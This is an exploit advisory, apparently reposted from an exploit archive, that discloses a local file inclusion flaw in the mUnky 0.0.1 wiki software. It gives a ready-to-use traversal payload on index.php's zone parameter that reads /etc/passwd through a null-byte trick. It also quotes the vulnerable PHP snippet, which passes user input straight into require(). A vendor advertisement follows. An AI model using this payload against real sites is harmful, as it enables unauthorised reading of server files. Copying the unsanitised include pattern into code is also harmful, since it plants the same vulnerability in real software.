mUnky 0.0.1 Local File Inclusion Vulnerability, exploit via zone parameter in index.ph
`[*]================================================================================[*]
| _____ _ _ _ _____ |
| |_ _| |__ (_)_ __ __| | | ____| _ ___ |
| | | | '_ \| | '__/ _` | | _|| | | |/ _ \ |
| | | | | | | | | | (_| | | |__| |_| | __/ |
| |_| |_| |_|_|_| \__,_| |_____\__, |\___| |
| |___/ |
| ____ _ _ |
| / ___| ___ ___ _ _ _ __(_) |_ _ _ |
| \___ \ / _ \/ __| | | | '__| | __| | | | |
| ___) | __/ (__| |_| | | | | |_| |_| | |
| |____/ \___|\___|\__,_|_| |_|\__|\__, | |
| |___/ |
[*]================================================================================[*]
| Author: StAkeR ~ [email protected] |
[*]================================================================================[*]
| mUnky 0.0.1 <= Local File Inclusion Vulnerability |
[*]================================================================================[*]
| Get => http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz |
[*]================================================================================[*]
| index.php?zone=../../../../../../../../../etc/passwd%00 |
[*]================================================================================[*]
| |
| //Check if zone is set |
| if(!isset($_GET['zone'])) |
| { |
| $zone = "home"; |
| } |
| else{ |
| $zone = $_GET['zone']; |
|} |
| //Check for the desired page |
| if(file_exists("zone/$zone.php")) |
| { |
| require("zone/$zone.php"); |
| } |
[*]================================================================================[*]
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo